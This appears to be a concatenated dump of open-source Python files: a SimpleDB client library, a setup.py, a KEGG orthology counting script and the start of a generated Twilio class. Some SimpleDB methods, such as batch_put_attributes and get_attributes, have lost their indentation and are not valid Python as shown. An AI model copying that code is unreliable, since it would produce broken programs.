        if value.isdigit():
            return int(value) - 10000
        return value
class SimpleDB(object):
    """Represents a connection to Amazon SimpleDB."""
    # XML namespace / API version of the 2009-04-15 SimpleDB API.
    ns = 'http://sdb.amazonaws.com/doc/2009-04-15/'
    service_version = '2009-04-15'
    # Prefer HMAC-SHA256; fall back to HMAC-SHA1 on Pythons without hashlib.
    try:
        import hashlib # 2.5+
        signature_method = SignatureMethod_HMAC_SHA256
    except ImportError:
        signature_method = SignatureMethod_HMAC_SHA1
def __init__(self, aws_access_key, aws_secret_access_key, db='sdb.amazonaws.com',
             secure=True, encoder=AttributeEncoder()):
    """
    Use your `aws_access_key` and `aws_secret_access_key` to create a connection to
    Amazon SimpleDB.

    SimpleDB requests are directed to the host specified by `db`, which defaults to
    ``sdb.amazonaws.com``.

    The optional `secure` argument specifies whether HTTPS should be used. The
    default value is ``True``.
    """
    self.aws_key = aws_access_key
    self.aws_secret = aws_secret_access_key
    # Scheme is fixed at construction time and used when building endpoint URLs.
    if secure:
        self.scheme = 'https'
    else:
        self.scheme = 'http'
    self.db = db
    self.http = httplib2.Http()
    # Encoder translating Python values to/from SimpleDB string attributes.
    self.encoder = encoder
def _make_request(self, request):
    """Sign and POST `request`; return a Response wrapper.

    :raises SimpleDBError: when the service reply contains an
        Errors/Error element.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
               'host': self.db}
    request.set_parameter('Version', self.service_version)
    request.sign_request(self.signature_method(), self.aws_key, self.aws_secret)
    response, content = self.http.request(request.url, request.method, headers=headers, body=request.to_postdata())
    e = ET.fromstring(content)
    error = e.find('Errors/Error')
    # Bugfix: compare against None explicitly. An ElementTree Element with
    # no children is falsy, so the previous `if error:` could silently skip
    # a reported error element.
    if error is not None:
        raise SimpleDBError(error.find('Message').text)
    meta = e.find('{%s}ResponseMetadata' % self.ns)
    request_id = meta.find('{%s}RequestId' % self.ns).text
    usage = meta.find('{%s}BoxUsage' % self.ns).text
    return Response(response, content, request_id, usage)
def _sdb_url(self):
    # Base endpoint URL, e.g. 'https://sdb.amazonaws.com'.
    return urlparse.urlunparse((self.scheme, self.db, '', '', '', ''))
def create_domain(self, name):
    """
    Creates a new domain.

    The domain `name` argument must be a string, and must be unique among
    the domains associated with your AWS Access Key. The CreateDomain operation
    may take 10 or more seconds to complete. By default, you can create up to
    100 domains per account.

    Returns the newly created `Domain` object.
    """
    data = {
        'Action': 'CreateDomain',
        'DomainName': name,
    }
    request = Request("POST", self._sdb_url(), data)
    # Errors surface as SimpleDBError from _make_request.
    self._make_request(request)
    return Domain(name, self)
def delete_domain(self, domain):
    """
    Deletes a domain. Any items (and their attributes) in the domain are
    deleted as well. The DeleteDomain operation may take 10 or more seconds
    to complete.

    The `domain` argument can be a string representing the name of the
    domain, or a `Domain` object.
    """
    # Accept both a Domain instance and a bare name.
    if isinstance(domain, Domain):
        domain = domain.name
    data = {
        'Action': 'DeleteDomain',
        'DomainName': domain,
    }
    request = Request("POST", self._sdb_url(), data)
    self._make_request(request)
def _list_domains(self):
    # Generator that yields each domain associated with the AWS Access Key,
    # transparently following SimpleDB's NextToken pagination.
    data = {
        'Action': 'ListDomains',
        'MaxNumberOfDomains': '100',
    }
    while True:
        request = Request("POST", self._sdb_url(), data)
        response = self._make_request(request)
        e = ET.fromstring(response.content)
        domain_result = e.find('{%s}ListDomainsResult' % self.ns)
        # Bugfix: test against None. A childless Element is falsy, so the
        # old `if domain_result:` treated an empty (but present) result
        # element as missing.
        if domain_result is None:
            break
        domain_names = domain_result.findall('{%s}DomainName' % self.ns)
        for domain in domain_names:
            yield Domain(domain.text, self)
        # SimpleDB will return a max of 100 domains per request, and
        # will return a NextToken if there are more.
        next_token = domain_result.find('{%s}NextToken' % self.ns)
        if next_token is None:
            break
        data['NextToken'] = next_token.text
def list_domains(self):
    """
    Lists all domains associated with your AWS Access Key.

    Materializes the paginating generator into a list of Domain objects.
    """
    return list(self._list_domains())
def has_domain(self, domain):
    """Return True if `domain` (name or Domain object) exists for this account."""
    if isinstance(domain, Domain):
        domain = domain.name
    return any(existing.name == domain for existing in self.list_domains())
def get_domain_metadata(self, domain):
    """
    Returns information about the domain. Includes when the domain was
    created, the number of items and attributes, and the size of attribute
    names and values.

    The `domain` argument can be a string representing the name of the
    domain or a `Domain` object.
    """
    if isinstance(domain, Domain):
        domain = domain.name
    data = {
        'Action': 'DomainMetadata',
        'DomainName': domain,
    }
    request = Request("POST", self._sdb_url(), data)
    response = self._make_request(request)
    e = ET.fromstring(response.content)
    metadata = {}
    metadata_result = e.find('{%s}DomainMetadataResult' % self.ns)
    if metadata_result is not None:
        # ElementTree prefixes tags with '{namespace}'. Strip it by its
        # computed length rather than the old hard-coded 42-character
        # slice, which silently breaks if the namespace ever changes.
        ns_prefix = '{%s}' % self.ns
        # Iterate the element directly (getchildren() is deprecated).
        for child in metadata_result:
            tag, text = child.tag, child.text
            if tag.startswith(ns_prefix):
                tag = tag[len(ns_prefix):]
            metadata[tag] = text
    return metadata
def put_attributes(self, domain, item, attributes):
    """
    Creates or replaces attributes in an item.

    The `domain` and `item` arguments can be strings representing the
    domain and item names, or `Domain` and `Item` objects, respectively.

    The `attributes` argument should be a dictionary containing the
    attribute names -> values that you would like stored for the
    specified `item` or a list of (<attribute name>, <value>, <replace>)
    tuples.

    By default, attributes are "replaced". This causes new attribute values to
    overwrite existing values. For example, if an item has the attributes
    ('a', '1'), ('b', '2') and ('b', '3') and you call put_attributes using
    the attributes ('b', '4'), the final attributes of the item are changed to
    ('a', '1') and ('b', '4'), which replaces the previous value of the 'b'
    attribute with the new value.

    SimpleDB allows you to associate multiple values with a single attribute.
    If an attribute has multiple values, it will be coalesced into a single
    list. Likewise, if you'd like to store multiple values for a single
    attribute, you should pass in a list value to this method.
    """
    if isinstance(domain, Domain):
        domain = domain.name
    if isinstance(item, Item):
        item = item.name
    if hasattr(attributes, 'items'):
        # Normalize attributes into a list of tuples.
        attributes = attributes.items()
    data = {
        'Action': 'PutAttributes',
        'DomainName': domain,
        'ItemName': item,
    }
    # Flatten every (name, value(s)[, replace]) entry into the numbered
    # Attribute.N.* parameters the PutAttributes API expects.
    idx = 0
    for attribute in attributes:
        name = attribute[0]
        values = attribute[1]
        # Wrap a scalar (including strings) into a one-element list.
        if not hasattr(values, '__iter__') or isinstance(values, basestring):
            values = [values]
        for value in values:
            value = self.encoder.encode(domain, name, value)
            data['Attribute.%s.Name' % idx] = name
            data['Attribute.%s.Value' % idx] = value
            # 2-tuples default to replace; 3-tuples carry an explicit flag.
            if len(attribute) == 2 or attribute[2]:
                data['Attribute.%s.Replace' % idx] = 'true'
            idx += 1
    request = Request("POST", self._sdb_url(), data)
    self._make_request(request)
def batch_put_attributes(self, domain, items, replace=True):
"""
Performs multiple PutAttribute operations in a single call. This yields
savings in round trips and latencies and enables SimpleDB to optimize
your request, which generally yields better throughput.
The `domain` argument can be a string representing the name of the
domain or a `Domain` object.
The `items` argument should be a list of `Item` objects or a list of
(<item name>, <attributes>) tuples. See the documentation for the
put_attribute method for a description of how attributes should be
represented.
"""
if isinstance(domain, Domain):
domain = domain.name
data = {
'Action': 'BatchPutAttributes',
'DomainName': domain,
}
for item_idx, item in enumerate(items):
if isinstance(item, Item):
item = [item.name, item.attributes]
item = list(item)
if hasattr(item[1], 'items'):
# Normalize attributes into a list of tuples.
item[1] = item[1].items()
data['Item.%s.ItemName' % item_idx] = item[0]
attr_idx = 0
for attribute in item[1]:
name = attribute[0]
values = attribute[1]
if isinstance(values, basestring):
values = [values]
for value in values:
value = self.encoder.encode(domain, name, value)
data['Item.%s.Attribute.%s.Name' % (item_idx, attr_idx)] = name
data['Item.%s.Attribute.%s.Value' % (item_idx, attr_idx)] = value
if len(attribute) == 2 or attribute[2]:
data['Item.%s.Attribute.%s.Replace' % (item_idx, attr_idx)] = 'true'
attr_idx += 1
request = Request("POST", self._sdb_url(), data)
self._make_request(request)
    def delete_attributes(self, domain, item, attributes=None):
        """
        Deletes one or more attributes associated with an item. If all attributes of
        an item are deleted, the item is deleted.

        If the optional parameter `attributes` is not provided, all of the
        item's attributes are deleted (which deletes the item itself).
        """
        if isinstance(domain, Domain):
            domain = domain.name
        if isinstance(item, Item):
            item = item.name
        if attributes is None:
            # Sending no Attribute.* parameters deletes every attribute.
            attributes = {}
        data = {
            'Action': 'DeleteAttributes',
            'DomainName': domain,
            'ItemName': item,
        }
        # NOTE(review): unlike put_attributes, list values are not expanded
        # here -- confirm callers only pass scalar values per attribute.
        for i, (name, value) in enumerate(attributes.iteritems()):
            value = self.encoder.encode(domain, name, value)
            data['Attribute.%s.Name' % i] = name
            data['Attribute.%s.Value' % i] = value
        request = Request("POST", self._sdb_url(), data)
        self._make_request(request)
def get_attributes(self, domain, item, attributes=None):
"""
Returns all of the attributes associated with the item.
The returned attributes can be limited by passing a list of attribute
names in the optional `attributes` argument.
If the item does not exist, an empty set is returned. An error is not
raised because SimpleDB provides no guarantee that the item does not
exist on another replica. In other words, if you fetch attributes that
should exist, but get an empty set, you may have better luck if you try
again in a few hundred milliseconds.
"""
if isinstance(domain, Domain):
domain = domain.name
if isinstance(item, Item):
item = item.name
data = {
'Action': 'GetAttributes',
'DomainName': domain,
'ItemName': item,
}
if attributes:
for i, attr in enumerate(attributes):
data['AttributeName.%s' % i] = attr
request = Request("POST", self._sdb_url(), data)
response = self._make_request(request)
e = ET.fromstring(response.content)
attributes = dict.fromkeys(attributes or [])
attr_node = e.find('{%s}GetAttributesResult' % self.ns)
if attr_node:
attributes.update(self._parse_attributes(domain, attr_node))
return attributes
def _parse_attributes(self, domain, attribute_node):
# attribute_node should be an ElementTree node containing Attribute
# child elements.
attributes = {}
for attribute in attribute_node.findall('{%s}Attribute' % self.ns):
name = attribute.find('{%s}Name' % self.ns).text
value = attribute.find('{%s}Value' % self.ns).text
value = self.encoder.decode(domain, name, value)
if name in attributes:
if isinstance(attributes[name], list):
attributes[name].append(value)
else:
attributes[name] = [attributes[name], value]
else:
attributes[name] = value
return attributes
    def _select(self, domain, expression):
        """Generator that runs a Select `expression` against `domain`,
        yielding Item objects and transparently following pagination."""
        if not isinstance(domain, Domain):
            domain = Domain(domain, self)
        data = {
            'Action': 'Select',
            'SelectExpression': expression,
        }
        # Loop once per result page; `data` is re-posted with the NextToken
        # from the previous page until the server stops returning one.
        while True:
            request = Request("POST", self._sdb_url(), data)
            response = self._make_request(request)
            e = ET.fromstring(response.content)
            item_node = e.find('{%s}SelectResult' % self.ns)
            if item_node is not None:
                for item in item_node.findall('{%s}Item' % self.ns):
                    name = item.findtext('{%s}Name' % self.ns)
                    attributes = self._parse_attributes(domain, item)
                    yield Item(self, domain, name, attributes)
                # SimpleDB will return a max of 100 items per request, and
                # will return a NextToken if there are more.
                next_token = item_node.find('{%s}NextToken' % self.ns)
                if next_token is None:
                    break
                data['NextToken'] = next_token.text
            else:
                # No SelectResult element at all: nothing (more) to yield.
                break
    def select(self, domain, expression):
        """Run a Select expression and return all matching Items as a list
        (eagerly drains the paginated `_select` generator)."""
        return list(self._select(domain, expression))
    def __iter__(self):
        # Iterating the client yields its domains.
        # NOTE(review): `_list_domains` is defined elsewhere in this class.
        return self._list_domains()
    def __getitem__(self, name):
        """Return a Domain handle for `name` (no existence check is made)."""
        # TODO: Check if it's a valid domain
        return Domain(name, self)
    def __delitem__(self, name):
        """Delete the named domain."""
        self.delete_domain(name)
class where(object):
    """
    Encapsulate where clause as objects that can be combined logically using
    & and |.
    """
    # Connection types
    AND = 'AND'
    OR = 'OR'
    default = AND
    def __init__(self, *args, **query):
        self.connector = self.default
        self.children = []
        self.children.extend(args)
        for key, value in query.iteritems():
            if '__' in key:
                # Keyword filters look like `field__operation=value`.
                parts = key.split('__')
                if len(parts) != 2:
                    raise ValueError("Filter arguments should be of the form "
                                     "`field__operation`")
                field, operation = parts
            else:
                # A bare keyword argument is an equality test.
                field, operation = key, 'eq'
            if operation not in QUERY_OPERATORS:
                raise ValueError('%s is not a valid query operation' % (operation,))
            self.children.append((field, operation, value))
    def __len__(self):
        return len(self.children)
    def to_expression(self, encoder):
        """
        Returns the query expression for the where clause. Returns an empty
        string if the node is empty.

        `encoder` is a callable (attribute, value) -> encoded value supplied
        by the Query, since `where` nodes do not know their Domain.
        """
        where = []
        for child in self.children:
            if hasattr(child, 'to_expression'):
                # Nested where node: parenthesize its sub-expression.
                expr = child.to_expression(encoder)
                if expr:
                    where.append('(%s)' % expr)
            else:
                field, operation, value = child
                operator = QUERY_OPERATORS[operation]
                # Dispatch to a specialised builder (eq, in, btwn, ...) when
                # one exists, otherwise use the generic form.
                if hasattr(self, '_make_%s_condition' % operation):
                    expr = getattr(self, '_make_%s_condition' % operation)(field, operator, value, encoder)
                else:
                    expr = self._make_condition(field, operator, value, encoder)
                where.append(expr)
        conn_str = ' %s ' % self.connector
        return conn_str.join(where)
    def add(self, other, conn):
        """
        Adds a new clause to the where statement. If the connector type is the
        same as the root's current connector type, the clause is added to the
        first level. Otherwise, the whole tree is pushed down one level and a
        new root connector is created, connecting the existing clauses and the
        new clause.
        """
        if other in self.children and conn == self.connector:
            return
        if len(self.children) < 2:
            self.connector = conn
        if self.connector == conn:
            if isinstance(other, where) and (other.connector == conn or
                                             len(other) <= 1):
                self.children.extend(other.children)
            else:
                self.children.append(other)
        else:
            obj = self._clone()
            self.connector = conn
            self.children = [obj, other]
    def _make_condition(self, attribute, operation, value, encoder):
        value = encoder(attribute, value)
        return "%s %s '%s'" % (self._quote_attribute(attribute),
                               operation, self._quote(value))
    def _make_eq_condition(self, attribute, operation, value, encoder):
        value = encoder(attribute, value)
        if value is None:
            # BUGFIX: quote the attribute name here too, so reserved keywords
            # are backtick-escaped consistently with _make_condition.
            return '%s IS NULL' % self._quote_attribute(attribute)
        return self._make_condition(attribute, operation, value, encoder)
    def _make_noteq_condition(self, attribute, operation, value, encoder):
        value = encoder(attribute, value)
        if value is None:
            # BUGFIX: same reserved-keyword quoting as _make_eq_condition.
            return '%s IS NOT NULL' % self._quote_attribute(attribute)
        return self._make_condition(attribute, operation, value, encoder)
    def _make_in_condition(self, attribute, operation, value, encoder):
        value = [encoder(attribute, v) for v in value]
        # BUGFIX: the attribute name was previously emitted unquoted here.
        return '%s %s(%s)' % (self._quote_attribute(attribute), operation,
                              ', '.join("'%s'" % self._quote(v) for v in value))
    def _make_btwn_condition(self, attribute, operation, value, encoder):
        if len(value) != 2:
            raise ValueError('Invalid value `%s` for between clause. Requires two item list.' % value)
        value = [encoder(attribute, value[0]), encoder(attribute, value[1])]
        # BUGFIX: the attribute name was previously emitted unquoted here.
        return "%s between '%s' and '%s'" % (self._quote_attribute(attribute),
                                             self._quote(value[0]), self._quote(value[1]))
    def _quote_attribute(self, s):
        # Backtick-quote attribute names that collide with reserved keywords.
        if s.upper() in RESERVED_KEYWORDS:
            return '`%s`' % s
        return s
    def _quote(self, s):
        # Escape single quotes for embedding in a quoted SimpleDB literal.
        return s.replace('\'', '\'\'')
    def _clone(self, klass=None, **kwargs):
        if klass is None:
            klass = self.__class__
        obj = klass()
        obj.connector = self.connector
        obj.children = self.children[:]
        return obj
    def _combine(self, other, conn):
        if not isinstance(other, where):
            raise TypeError(other)
        obj = self._clone()
        obj.add(other, conn)
        return obj
    def __or__(self, other):
        return self._combine(other, self.OR)
    def __and__(self, other):
        return self._combine(other, self.AND)
class every(where):
    """
    A `where` clause built with SimpleDB's every() operator: for a
    multi-valued attribute the condition must hold for *every* value.
    """
    def _every(self, attribute):
        # Wrap the (keyword-quoted) attribute name in every(...).
        return "every(%s)" % self._quote_attribute(attribute)
    def _make_condition(self, attribute, operation, value, encoder):
        wrapped = self._every(attribute)
        return super(every, self)._make_condition(wrapped, operation, value, encoder)
    def _make_eq_condition(self, attribute, operation, value, encoder):
        # Only the IS NULL form (value is None) needs the every() wrapper
        # applied here; otherwise the base class routes via _make_condition.
        target = self._every(attribute) if value is None else attribute
        return super(every, self)._make_eq_condition(target, operation, value, encoder)
    def _make_noteq_condition(self, attribute, operation, value, encoder):
        target = self._every(attribute) if value is None else attribute
        return super(every, self)._make_noteq_condition(target, operation, value, encoder)
    def _make_in_condition(self, attribute, operation, value, encoder):
        wrapped = self._every(attribute)
        return super(every, self)._make_in_condition(wrapped, operation, value, encoder)
    def _make_btwn_condition(self, attribute, operation, value, encoder):
        wrapped = self._every(attribute)
        return super(every, self)._make_btwn_condition(wrapped, operation, value, encoder)
class item_name(where):
    """
    A `where` clause that filters on item names via the itemName() function.
    """
    def __init__(self, *equals, **query):
        self.connector = self.default
        self.children = []
        # Positional arguments are equality tests on itemName().
        for wanted in equals:
            self.children.append(('itemName()', 'eq', wanted))
        # Keyword arguments name the operation directly, e.g. like='foo%'.
        for operation, value in query.iteritems():
            self.children.append(('itemName()', operation, value))
class Query(object):
    """
    A lazily-evaluated, chainable SELECT query over a SimpleDB Domain,
    loosely modelled on Django querysets.
    """
    DESCENDING = 'DESC'
    ASCENDING = 'ASC'
    def __init__(self, domain):
        self.domain = domain
        self.where = where()
        self.fields = []
        # NOTE: this instance attribute shadows the `limit` method below.
        self.limit = None
        self.order = None
        self._result_cache = None
    def __iter__(self):
        return iter(self._get_results())
    def __len__(self):
        return len(self._get_results())
    def __repr__(self):
        return repr(list(self))
    def __getitem__(self, k):
        if not isinstance(k, (slice, int, long)):
            raise TypeError
        # BUGFIX: compare against None -- an empty cached result list is
        # falsy and previously triggered a pointless re-query.
        if self._result_cache is not None:
            return self._result_cache[k]
        q = self._clone()
        # Limit the server-side fetch when the requested index/slice allows.
        if isinstance(k, slice) and k.stop >= 0:
            q.limit = k.stop + 1
        elif k >= 0:
            q.limit = k + 1
        return list(q)[k]
    def all(self):
        return self._clone()
    def limit(self, limit):
        # NOTE(review): unreachable on instances -- `self.limit = None` in
        # __init__ shadows this method.  Assign `q.limit` directly (or slice
        # the query) instead; kept only for interface compatibility.
        q = self._clone()
        q.limit = limit
        return q
    def filter(self, *args, **kwargs):
        """Return a new query with extra `where` constraints ANDed on."""
        q = self._clone()
        q.where = self.where & where(*args, **kwargs)
        return q
    def values(self, *fields):
        """Return a new query selecting only the given output fields."""
        q = self._clone()
        q.fields = fields
        return q
    def item_names(self):
        """Return a query variant that yields bare item names."""
        q = self._clone(klass=ItemNameQuery)
        return q
    def count(self):
        # Serve from cache when the query has already been evaluated,
        # including the zero-row case (previously re-queried).
        if self._result_cache is not None:
            return len(self._result_cache)
        q = self._clone()
        q.fields = ['count(*)']
        return int(list(q)[0]['Count'])
    def order_by(self, field):
        """Order by `field`; prefix with '-' for descending order."""
        q = self._clone()
        if field[0] == '-':
            field = field[1:]
            q.order = (field, self.DESCENDING)
        else:
            q.order = (field, self.ASCENDING)
        return q
    def get(self, name):
        """Return the single item called `name` or raise ItemDoesNotExist."""
        q = self._clone()
        q = q.filter(item_name(name))
        if len(q) < 1:
            raise ItemDoesNotExist(name)
        return q[0]
    def to_expression(self):
        """
        Creates the query expression for this query. Returns the expression
        string.
        """
        # Used to encode attribute values in `where` instances, since they
        # don't know the Domain they're operating on.
        encoder = lambda a, v: self.domain._encode(a, v)
        if self.fields:
            output_list = self.fields
        else:
            output_list = ['*']
        stmt = ['SELECT', ', '.join(output_list), 'FROM', '`%s`' % self.domain.name]
        if len(self.where):
            stmt.extend(['WHERE', self.where.to_expression(encoder)])
        if self.order is not None:
            stmt.append('ORDER BY')
            stmt.extend(self.order)
        if self.limit is not None:
            stmt.append('LIMIT %s' % self.limit)
        return ' '.join(stmt)
    def _clone(self, klass=None, **kwargs):
        if klass is None:
            klass = self.__class__
        q = klass(self.domain)
        q.where = self.where._clone()
        q.fields = self.fields[:]
        # BUGFIX: propagate `limit`; it was previously dropped by every
        # chained call (filter, values, order_by, count, ...).
        q.limit = self.limit
        q.order = self.order
        q.__dict__.update(kwargs)
        return q
    def _get_results(self):
        if self._result_cache is None:
            self._result_cache = self.domain.select(self.to_expression())
        return self._result_cache
class ItemNameQuery(Query):
    """A Query variant that yields bare item names instead of Item objects."""
    def values(self, *fields):
        # Selecting arbitrary output fields makes no sense for a
        # name-only query.
        raise NotImplementedError
    def _get_fields(self):
        # The output list is always the single special field itemName().
        return ['itemName()']
    def _set_fields(self, value):
        # Silently ignore any attempt to override the field list.
        pass
    fields = property(_get_fields, _set_fields)
    def _get_results(self):
        if self._result_cache is None:
            matches = self.domain.select(self.to_expression())
            self._result_cache = [match.name for match in matches]
        return self._result_cache
class Domain(object):
    """
    A SimpleDB domain: a named collection of items with dict-like access
    and queryset-like filtering.
    """
    def __init__(self, name, simpledb):
        self.name = name
        self.simpledb = simpledb
        # Local cache of Item objects fetched through get().
        self.items = {}
    @property
    def metadata(self):
        return self.simpledb.get_domain_metadata(self)
    def filter(self, *args, **kwargs):
        return self._get_query().filter(*args, **kwargs)
    def select(self, expression):
        return self.simpledb.select(self, expression)
    def all(self):
        return self._get_query()
    def count(self):
        return self._get_query().count()
    def values(self, *args):
        return self._get_query().values(*args)
    def item_names(self):
        return self._get_query().item_names()
    def get(self, name):
        """Return the named Item; raise ItemDoesNotExist when it has no
        attributes (SimpleDB's way of saying it does not exist)."""
        if name not in self.items:
            self.items[name] = Item.load(self.simpledb, self, name)
        item = self.items[name]
        if not item:
            # BUGFIX: evict the empty result instead of caching it forever;
            # SimpleDB is eventually consistent, so a later call may succeed
            # (previously the stale negative cache made every retry fail).
            del self.items[name]
            raise ItemDoesNotExist(name)
        return item
    def _encode(self, attribute, value):
        # Encode an attribute, value combination using the simpledb AttributeEncoder.
        return self.simpledb.encoder.encode(self.name, attribute, value)
    def __getitem__(self, name):
        try:
            return self.get(name)
        except ItemDoesNotExist:
            # Hand back an empty, unsaved Item so assignment-style creation
            # (domain[name][attr] = value; item.save()) works.
            return Item(self.simpledb, self, name, {})
    def __setitem__(self, name, value):
        if not hasattr(value, '__getitem__') or isinstance(value, basestring):
            raise SimpleDBError('Domain items must be dict-like, not `%s`' % type(value))
        # Clear any existing attributes first, then store the new mapping.
        del self[name]
        item = Item(self.simpledb, self, name, value)
        item.save()
    def __delitem__(self, name):
        self.simpledb.delete_attributes(self, name)
        if name in self.items:
            del self.items[name]
    def __unicode__(self):
        return self.name
    def __iter__(self):
        return iter(self.all())
    def __repr__(self):
        return '<%s: %s>' % (self.__class__.__name__, unicode(self))
    def _get_query(self):
        return Query(self)
class Item(DictMixin):
    """A dict-like SimpleDB item mapping attribute names to value(s)."""
    @classmethod
    def load(cls, simpledb, domain, name):
        """Fetch the item's attributes from SimpleDB and build an Item."""
        fetched = simpledb.get_attributes(domain, name)
        return cls(simpledb, domain, name, fetched)
    def __init__(self, simpledb, domain, name, attributes=None):
        self.simpledb = simpledb
        self.domain = domain
        self.name = name
        self.attributes = attributes or {}
    def __getitem__(self, name):
        return self.attributes[name]
    def __setitem__(self, name, value):
        self.attributes[name] = value
    def __delitem__(self, name):
        # Silently ignore unknown names; delete remotely, then locally.
        if name in self.attributes:
            self.simpledb.delete_attributes(self.domain, self,
                                            {name: self.attributes[name]})
            del self.attributes[name]
    def keys(self):
        return self.attributes.keys()
    def save(self):
        """Persist all local attributes back to SimpleDB."""
        self.simpledb.put_attributes(self.domain, self, self.attributes)
|
saymedia/python-simpledb
|
simpledb/simpledb.py
|
Python
|
bsd-3-clause
| 33,851
|
#!/usr/bin/env python
"""Packaging script for the google-atom `atom` package."""
from distutils.core import setup

setup(
    name='atom',
    version='2.0.18',
    author='Jeffrey Scudder',
    author_email='j.s@google.com',
    license='Apache 2.0',
    url='https://github.com/qmagico/google-atom',
    packages=['atom'],
    package_dir={'atom': 'atom'},
)
|
qmagico/google-atom
|
setup.py
|
Python
|
apache-2.0
| 311
|
'''
lcakegg2counts.py
==================
:Author: Nick Ilott
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
Count the number of alignments assigned to KEGG orthology (KO) groups. The
alignments can be counted at different levels of the KO hierarchy, i.e.
categories A-D, ranging from high-level pathway down to individual KO gene.
KO = KEGG orthology.
Usage
-----
Example::
cat in.lcakegg | python lcakegg2counts.py --kegg-table=kegg.table
Type::
python lcakegg2counts.py --help
for command line help.
Command line options
--------------------
'''
import os
import sys
import re
import optparse
import collections
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
########################################
########################################
########################################
class KeggAssignment(object):
    '''
    Associates a single alignment (read) with its KEGG orthology (KO)
    assignments.
    '''
    def __init__(self):
        '''
        Start with no read identifier and no KO assignments.
        '''
        self.identifier = None
        self.ko = []
    def getKo(self, identifier, ko):
        '''
        Record the read identifier and its KO list; return self so the
        call can be chained onto construction.
        '''
        self.identifier = identifier
        self.ko = ko
        return self
#######################################
def lcakegg_iterator(infile):
    '''
    Iterate over KEGG assignments in the output of lcamapper.sh.

    Each line is ";"-separated; field 0 is the read identifier and field 2
    holds the KO assignments as "K...:" tokens.  Yields one KeggAssignment
    per line.
    '''
    # BUGFIX/perf: iterate the file lazily instead of loading it all into
    # memory with readlines().
    for line in infile:
        fields = line[:-1].split(";")
        identifier = fields[0]
        # Tokens look like "K00001:"; drop the trailing ":".
        # NOTE(review): assumes every matched token ends with ":" -- confirm
        # against lcamapper.sh output.
        ko = [token[:-1] for token in re.findall(r"K\S+", fields[2])]
        yield KeggAssignment().getKo(identifier, ko)
#######################################
#######################################
#######################################
class KeggTableEntry(object):
    '''
    Maps a KEGG orthology (KO) identifier onto its pathway categories.

    cata, catb and catc are the A, B and C levels of the KEGG KO hierarchy.
    '''
    def __init__(self):
        '''
        Start with no KO and no category assignments.
        '''
        self.ko = None
        self.cata = None
        self.catb = None
        self.catc = None
    def getMapping(self, ko, cata, catb, catc):
        '''
        Record the KO -> (category A, B, C) mapping; return self so the
        call can be chained onto construction.
        '''
        self.ko = ko
        self.cata = cata
        self.catb = catb
        self.catc = catc
        return self
#######################################
def kegg_table_iterator(infile):
    '''
    Iterate over a KEGG table (output of the keggtre2table.py script).

    Each tab-separated line holds the category A, B and C names in the
    first three columns and the KO identifier in the last column.  Yields
    one KeggTableEntry per line.
    '''
    # BUGFIX/perf: iterate the file lazily instead of loading it all into
    # memory with readlines().
    for line in infile:
        fields = line[:-1].split("\t")
        ko, cata, catb, catc = fields[-1], fields[0], fields[1], fields[2]
        yield KeggTableEntry().getMapping(ko, cata, catb, catc)
#######################################
#######################################
#######################################
def main( argv = None ):
    """script main.

    Parses command line options in sys.argv, unless *argv* is given, then
    counts alignments per KEGG KO or per KO-hierarchy category and writes
    one "<pathway>\\t<count-or-proportion>" line per category to stdout.
    """
    if argv is None:
        argv = sys.argv
    # setup command line parser
    parser = E.OptionParser( version = "%prog version: $Id$",
                             usage = globals()["__doc__"] )
    parser.add_option("-k", "--kegg-table", dest="kegg_table", type="string",
                      help="supply table of pathways to KO mappings. Usually by \
                      keggtre2table.py ")
    parser.add_option("-m", "--method", dest="method", type="choice",
                      choices=("count", "proportion"), help="method for computing counts")
    parser.add_option("-l", "--level", dest="level", type="choice",
                      choices=("A", "B", "C", "D"), help="what level of the KEGG KO hierarchy \
                      to perform the analysis?")
    # set default options
    parser.set_defaults(method="proportion",
                        level="A")
    ## add common options (-h/--help, ...) and parse command line
    (options, args) = E.Start( parser, argv = argv )
    if not options.kegg_table:
        raise ValueError("must specify a KEGG table")
    E.info("reading KEGG table")
    # container mapping KO -> (category A, category B, category C)
    kegg = {}
    c = E.Counter()
    for ko in kegg_table_iterator(IOTools.openFile(options.kegg_table)):
        c.ko_input += 1
        kegg[ko.ko] = (ko.cata, ko.catb, ko.catc)
    E.info("read in KEGG table")
    E.info("iterating over alignments")
    # Map hierarchy level -> index into the (cata, catb, catc) tuple.
    # Level "D" counts raw KO identifiers and therefore has no index.
    level_to_index = {"A": 0, "B": 1, "C": 2, "D": None}
    catindex = level_to_index[options.level]
    result = collections.defaultdict(int)
    for alignment in lcakegg_iterator(options.stdin):
        c.input += 1
        if not alignment.ko:
            c.unmapped += 1
        else:
            c.mapped += 1
            if catindex is None:
                # BUGFIX: was `if not catindex:`, which also matched level
                # "A" (index 0) and wrongly counted raw KOs instead of
                # category-A pathways.
                # Level D: count KO identifiers directly; a read mapping to
                # multiple KOs contributes one count per KO.
                for k in alignment.ko:
                    result[k] += 1
            else:
                # Count pathway categories; a KO missing from the KEGG table
                # counts as no_hit (note: one missing KO aborts counting of
                # the remaining KOs for this read, as before).
                try:
                    for k in alignment.ko:
                        result[kegg[k][catindex]] += 1
                except KeyError:
                    c.no_hit += 1
    total_mapped = c.mapped
    for pathway, count in result.iteritems():
        if options.method == "proportion":
            options.stdout.write("\t".join([pathway, str(float(count)/total_mapped)]) + "\n")
        else:
            options.stdout.write("\t".join([pathway, str(count)]) + "\n")
    # BUGFIX: guard against ZeroDivisionError when nothing mapped, and
    # terminate the final output line with a newline like the others.
    if c.mapped:
        options.stdout.write("no_pathway_hit\t%s\n" % str(float(c.no_hit) / c.mapped))
    ## write footer and output benchmark information.
    E.Stop()
# Run the script only when executed directly (not on import).
if __name__ == "__main__":
    sys.exit( main(sys.argv) )
|
CGATOxford/proj029
|
scripts/lcakegg2counts.py
|
Python
|
bsd-3-clause
| 6,443
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class TollFreeList(ListResource):
    """List resource for an Account's toll-free IncomingPhoneNumbers
    (auto-generated by the Twilio API definition generator)."""
    def __init__(self, version, account_sid):
        """
        Initialize the TollFreeList
        :param Version version: Version that contains the resource
        :param account_sid: The SID of the Account that created the resource
        :returns: twilio.rest.api.v2010.account.incoming_phone_number.toll_free.TollFreeList
